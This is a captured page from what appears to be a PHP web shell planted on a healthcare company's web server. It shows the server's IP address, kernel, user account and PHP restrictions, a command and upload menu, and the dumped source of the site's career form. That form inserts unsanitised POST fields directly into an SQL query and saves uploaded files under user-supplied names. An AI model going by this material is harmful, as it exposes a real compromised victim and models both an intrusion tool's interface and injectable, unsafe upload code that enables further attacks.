Server IP : 103.83.81.220 / Your IP : 3.142.172.190 Web Server : Apache System : Linux vps.erainfotech.co 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64 User : nirkonhealthcare ( 1248) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 323 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 329 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 335 OFF Directory (0755) : /home/nirkonhealthcare/public_html/header/../admin/career/../../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include "conn.php"; if (isset($_POST['submit'])) { $file = $_FILES['resume']; $file_name = $file['name']; $file_tmp = $file['tmp_name']; $file_size = $file['size']; $file_error = $file['error']; $file_ext = explode('.', $file_name); $file_ext = strtolower(end($file_ext)); $allowed = array('jpg', 'jpeg', 'pdf', 'png', 'word',); if (in_array($file_ext, $allowed)) { if ($file_error === 0) { if ($file_size <= 2097152) { $folder = "img/resume/" . $file_name; move_uploaded_file($file_tmp, $folder); } } } $title = $_POST['title']; $name = $_POST['name']; $email = $_POST['email']; $mobile = $_POST['mobile']; $message = $_POST['message']; $query = "INSERT INTO career_enq(profile, name, email, mobile, resume, message ) VALUES ('$title', '$name', '$email', '$mobile', '$folder', '$message' ) "; mysqli_query($connect, $query) or die($query); echo "<script> alert('Thanks for Apply Resume connecting!'); window.location.href='index.php'; </script>"; }